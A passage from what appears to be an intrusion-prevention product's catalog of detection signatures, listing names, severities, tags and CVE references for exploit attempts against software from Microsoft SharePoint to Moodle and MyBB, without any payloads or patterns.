Tags: Windows, Any Hardware, Internet Explorer 8.0, MS2011-02, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-385-4219
Vulnerability: Microsoft-Internet-Explorer-8-Ieshims.dll-Insecure-Library-Loading
Description:
Back to top

HTTP_CRL-Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2016-04, CVE2016, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-754-5211
Last changed: sgpkg-ips-754-5211
Vulnerability: Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading
Description:
Back to top

HTTP_CRL-Microsoft-OData-Protocol-Replace-Denial-Of-Service-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft OData Protocol detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-01, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-502-5211
Last changed: sgpkg-ips-502-5211
Vulnerability: Microsoft-OData-Protocol-Replace-Denial-Of-Service-Vulnerability
Description:
Back to top

HTTP_CRL-Microsoft-Office-SharePoint-Server-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Office SharePoint Server detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, Microsoft SharePoint Foundation, CVE2019, Windows not specific, Microsoft Office SharePoint Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1216-5242
Last changed: sgpkg-ips-1216-5242
Vulnerability: Microsoft-Office-SharePoint-Server-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Microsoft-Office-Sharepoint-Server-help.aspx-Cross-Site-Scripting

About this situation: An attempt to exploit a cross-site scripting vulnerability in Microsoft Office SharePoint Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, MS2010-06, CVE2010, Windows not specific, Microsoft Office SharePoint Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-303-4219
Last changed: sgpkg-ips-303-4219
Vulnerability: Microsoft-Office-Sharepoint-Server-help.aspx-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Microsoft-Report-Viewer-Control-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Report Viewer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Report Viewer, MS2011-08, CVE2011, Windows not specific, Microsoft Visual Studio not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: Microsoft-Report-Viewer-Control-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Microsoft-Sharepoint-Calendar-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Office SharePoint detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, MS2011-09, CVE2011, Windows not specific, Microsoft Office SharePoint Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-714-5211
Vulnerability: Microsoft-Sharepoint-Calendar-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Microsoft-Sharepoint-Editform-Script-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, MS2011-09, CVE2011, Windows not specific, Microsoft Office SharePoint Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1637-5242
Vulnerability: Microsoft-Sharepoint-Editform-Script-Injection-Vulnerability
Description:
Back to top

HTTP_CRL-Microsoft-Sharepoint-Macro-Workflow-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Microsoft Office SharePoint Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office SharePoint Server, MS2025-04, CVE2024, CVE2025, Windows not specific, Microsoft Office SharePoint Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1823-5242
Last changed: sgpkg-ips-1864-5242
Vulnerability: Microsoft-Sharepoint-Accessserviceslisteventreceiver-Insecure-Deserialization
Microsoft-Sharepoint-Remote-Code-Execution-CVE-2025-29793
Description:
Back to top

HTTP_CRL-Microsoft-Sharepoint-Server-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint Enterprise Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, CVE2020, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1637-5242
Vulnerability: Microsoft-Sharepoint-Server-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0017

About this situation: A cross-site scripting vulnarability in Microsoft SharePoint
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2012-02, CVE2012, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-513-5211
Vulnerability: Microsoft-Sharepoint-XSS-CVE-2012-0017
Description:
Back to top

HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0144

About this situation: A cross-site scripting vulnarability in Microsoft SharePoint
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2012-02, CVE2012, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1758-5242
Vulnerability: Microsoft-Sharepoint-XSS-CVE-2012-0144
Description:
Back to top

HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0145

About this situation: A cross-site scripting vulnarability in Microsoft SharePoint
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2012-02, CVE2012, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-513-5211
Vulnerability: Microsoft-Sharepoint-XSS-CVE-2012-0145
Description:
Back to top

HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2015-1640

About this situation: An attempt to exploit a vulnerability in Microsoft SharePoint detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2015-04, CVE2015, Windows not specific, Microsoft Sharepoint not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Microsoft-Sharepoint-Cross-Site-Scripting-Vulnerability-CVE-2015-1640
Description:
Back to top

HTTP_CRL-Microsoft-Sharepoint-XSS-Vulnerability-CVE-2014-1754

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2014-05, CVE2014, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-583-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Microsoft-Sharepoint-XSS-Vulnerability-CVE-2014-1754
Description:
Back to top

HTTP_CRL-Microsoft-SQL-Server-Reflected-XSS

About this situation: Detected attempt to exploit a vulnerability in Microsoft SQL Server
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server 2005, Microsoft SQL Server 2000, Microsoft SQL Server 2008, Microsoft SQL Server 2012, MS2012-10, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-484-5211
Last changed: sgpkg-ips-484-5211
Vulnerability: Microsoft-SQL-Server-Reflected-XSS
Description:
Back to top

HTTP_CRL-Microsoft-SQL-Server-Reporting-Services-ViewState-RCE

About this situation: An attempt to exploit a vulnerability in Microsoft SQL Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server, CVE2020, Windows not specific, Microsoft SQL Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1266-5242
Vulnerability: Microsoft-SQL-Server-Reporting-Services-ViewState-RCE
Description:
Back to top

HTTP_CRL-Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution

About this situation: Detects attempts to execute operating system commands via xp_cmdshell
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows 2000, Windows NT 4.0, Any Hardware, Microsoft SQL Server, Windows 2000 not specific, Windows NT 4.0 not specific, Microsoft SQL Server not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-867-5242
Vulnerability: Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
Description:
Back to top

HTTP_CRL-Microsoft-System-Center-Configuration-Manager-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Systems Management Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Systems Management Server, MS2012-09, CVE2012, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-478-5211
Vulnerability: Microsoft-System-Center-Configuration-Manager-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Microsoft-System-Center-Configuration-Manager-Vulnerability

About this situation: A vulnerability in Microsoft System Center Configuration Manager
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft System Center Configuration Manager, MS2012-09, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-476-5211
Vulnerability: Microsoft-System-Center-Configuration-Manager-Vulnerability
Description:
Back to top

HTTP_CRL-Microsoft-Visual-Studio-Team-Web-Access-Console-Vulnerability

About this situation: A vulnerability in Microsoft Visual Studio Team Web Access console
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio 2010, MS2012-09, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-476-5211
Vulnerability: Microsoft-Visual-Studio-Team-Web-Access-Console-Vulnerability
Description:
Back to top

HTTP_CRL-Microsoft-Windows-Active-Directory-Certificate-Services-CVE-2011-1264

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows 2003, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-06, CVE2011, Windows 2003 not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-397-4219
Last changed: sgpkg-ips-397-4219
Vulnerability: Microsoft-Windows-Active-Directory-Certificate-Services-CVE-2011-1264
Description:
Back to top

HTTP_CRL-Microsoft.NET-Iriparsing-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2014-10, CVE2014, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Vulnerability: Microsoft.NET-Iriparsing-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1295

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2019-09, CVE2019, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1187-5242
Last changed: sgpkg-ips-1187-5242
Vulnerability: Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1295
Description:
Back to top

HTTP_CRL-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-31181

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2021-05, CVE2021, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1347-5242
Last changed: sgpkg-ips-1347-5242
Vulnerability: Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-31181
Description:
Back to top

HTTP_CRL-Mida-Solutions-eFramework-ajaxreq.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Mida Solutions eFramework detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Mida Solutions eFramework, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1349-5242
Last changed: sgpkg-ips-1349-5242
Vulnerability: Mida-Solutions-eFramework-ajaxreq.php-Command-Injection
Description:
Back to top

HTTP_CRL-MineBridge-Trojan-Infection-Traffic

About this situation: MineBridge trojan infection traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: MineBridge-Trojan-Infection-Traffic
Description:
Back to top

HTTP_CRL-Mitel-MiCollab-SQL-Injection-CVE-2024-35286

About this situation: An attempt to exploit a vulnerability in Mitel MiCollab detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Mitel MiCollab, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1809-5242
Last changed: sgpkg-ips-1809-5242
Vulnerability: Mitel-MiCollab-SQL-Injection-CVE-2024-35286
Description:
Back to top

HTTP_CRL-Mitel-MiVoice-Connect-Remote-Code-Execution-CVE-2022-29499

About this situation: An attempt to exploit a vulnerability in Mitel MiVoice Connect detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Mitel MiVoice Connect, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Vulnerability: Mitel-MiVoice-Connect-Remote-Code-Execution-CVE-2022-29499
Description:
Back to top

HTTP_CRL-Mitel-SIP-Phone-Argument-Injection-CVE-2024-41710

About this situation: An attempt to exploit a vulnerability in Mitel SIP phone detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Mitel SIP Phone, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1831-5242
Last changed: sgpkg-ips-1831-5242
Vulnerability: Mitel-SIP-Phone-Argument-Injection-CVE-2024-41710
Description:
Back to top

HTTP_CRL-Mlflow-Experiments-Local-File-Inclusion-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in mlflow detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, mlflow, CVE2023, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Vulnerability: Mlflow-Experiments-Local-File-Inclusion-CVE-2023-6909
Mlflow-Experiments-Local-File-Inclusion-CVE-2024-2928
Description:
Back to top

HTTP_CRL-MobileIron-Remote-Code-Execution-CVE-2020-15505

About this situation: An attempt to exploit a vulnerability in MobileIron detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MobileIron, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1288-5242
Vulnerability: MobileIron-Remote-Code-Execution-CVE-2020-15505
Description:
Back to top

HTTP_CRL-Mobilespy.a-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Android.Spyware.Mobilespy.a-Botnet
Description:
Back to top

HTTP_CRL-MODx-Reflect-Base-File-Inclusion

About this situation: Detected an attempt to exploit a file inclusion vulnerability in MODx
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, MODx, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-194-2032
Last changed: sgpkg-ips-1607-5242
Vulnerability: MODx-Reflect-Base-File-Inclusion
Description:
Back to top

HTTP_CRL-MODX-Revolution-phpthumb.php-CVE-2018-1000207

About this situation: An attempt to exploit a vulnerability in MODX Revolution detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MODX Revolution, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Vulnerability: MODX-Revolution-phpthumb.php-CVE-2018-1000207
Description:
Back to top

HTTP_CRL-Mongo-Express-Remote-Code-Execution-CVE-2019-10758

About this situation: An attempt to exploit a vulnerability in Mongo Express detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Mongo Express, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Vulnerability: Mongo-Express-Remote-Code-Execution-CVE-2019-10758
Description:
Back to top

HTTP_CRL-MONSOON-CnC-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1363-5242
Vulnerability: MONSOON-Control-Traffic
Description:
Back to top

HTTP_CRL-Montala-Limited-ResourceSpace-Index.php-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in ResourceSpace detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ResourceSpace, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: Montala-Limited-ResourceSpace-Index.php-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Montala-Limited-ResourceSpace-Tiles.php-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in ResourceSpace detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ResourceSpace, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: Montala-Limited-ResourceSpace-Tiles.php-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CRL-Montala-ResourceSpace-User_Functions-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Montala ResourceSpace
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ResourceSpace, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Vulnerability: Montala-ResourceSpace-User_Functions-SQL-Injection
Description:
Back to top

HTTP_CRL-Moodle-Authenticated-Spelling-Binary-RCE

About this situation: An attempt to exploit a vulnerability in Moodle detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Moodle, CVE2013, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Moodle-Authenticated-Spelling-Binary-RCE
Description:
Back to top

HTTP_CRL-Moodle-Calculated-Question-Remote-Code-Execution-CVE-2018-1133

About this situation: An attempt to exploit a vulnerability in Moodle detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Moodle, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Moodle-Calculated-Question-Remote-Code-Execution-CVE-2018-1133
Description:
Back to top

HTTP_CRL-Moodle-Calculated-Question-Types-Remote-Code-Execution-CVE-2024-43425

About this situation: An attempt to exploit a vulnerability in Moodle detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Moodle, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: Moodle-Calculated-Question-Types-Remote-Code-Execution-CVE-2024-43425
Description:
Back to top

HTTP_CRL-Moodle-Remote-Command-Execution

About this situation: Moodle Remote Command Execution detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Moodle, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-572-5211
Vulnerability: Moodle-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Moodle-SpellChecker-Path-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in Moodle detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Moodle, CVE2021, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Moodle-SpellChecker-Path-Authenticated-RCE
Description:
Back to top

HTTP_CRL-Moodle-Teacher-Enrollment-Privilege-Escalation-To-RCE

About this situation: An attempt to exploit a vulnerability in Moodle detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Moodle, CVE2020, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Moodle-Teacher-Enrollment-Privilege-Escalation-To-RCE
Description:
Back to top

HTTP_CRL-MS-Forefront-UAG-ExcelTable-Reflected-XSS

About this situation: Attempt to exploit a vulnerability in Microsoft Forefront Unified Access Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Forefront Unified Access Gateway, MS2011-10, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1607-5242
Vulnerability: MS-Forefront-UAG-ExcelTable-Reflected-XSS
Description:
Back to top

HTTP_CRL-MS-Forefront-UAG-ExcelTable-Response-Splitting-XSS

About this situation: Attempt to exploit a vulnerability in Microsoft Forefront Unified Access Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Forefront Unified Access Gateway, MS2011-10, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: MS-Forefront-UAG-ExcelTable-Response-Splitting-XSS
Description:
Back to top

HTTP_CRL-MS-SCOM-Web-Console-XSS-Vulnerability-CVE-2013-0010

About this situation: XSS in SCOM
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft System Center Operations Manager, MS2013-01, CVE2013, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-502-5211
Last changed: sgpkg-ips-502-5211
Vulnerability: MS-SCOM-Web-Console-XSS-Vulnerability-CVE-2013-0010
Description:
Back to top

HTTP_CRL-Multiple-Solarwinds-Orion-Getaccounts-SQL-Injections

About this situation: An attempt to exploit a vulnerability in multiple SolarWinds products detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Orion IPAM, SolarWinds NetFlow Traffic Analyzer, SolarWinds Server and Application Monitor, SolarWinds Network Configuration Manager, SolarWinds Network Performance Monitor (NPM), SolarWinds User Device Tracker, SolarWinds VoIP and Network Quality Manager, SolarWinds Web Performance Monitor, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Multiple-Solarwinds-Orion-Getaccounts-SQL-Injections
Description:
Back to top

HTTP_CRL-Multiple-Vendor-CUPS-Administration-Interface-Cgi-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Apple CUPS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Common UNIX Printing System, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Multiple-Vendor-CUPS-Administration-Interface-Cgi-Heap-Overflow
Description:
Back to top

HTTP_CRL-Mutiny-Subnetmask-Injection

About this situation: An attempt to exploit a vulnerability in Munity network monitoring appliance
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Mutiny, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Vulnerability: Mutiny-Subnetmask-Injection
Description:
Back to top

HTTP_CRL-MyBB-Admin-Control-Panel-Code-Injection

About this situation: An attempt to exploit a vulnerability in MyBB Group MyBB detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MyBB, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1452-5242
Last changed: sgpkg-ips-1478-5242
Vulnerability: MyBB-Admin-Control-Panel-Code-Injection
Description:
Back to top

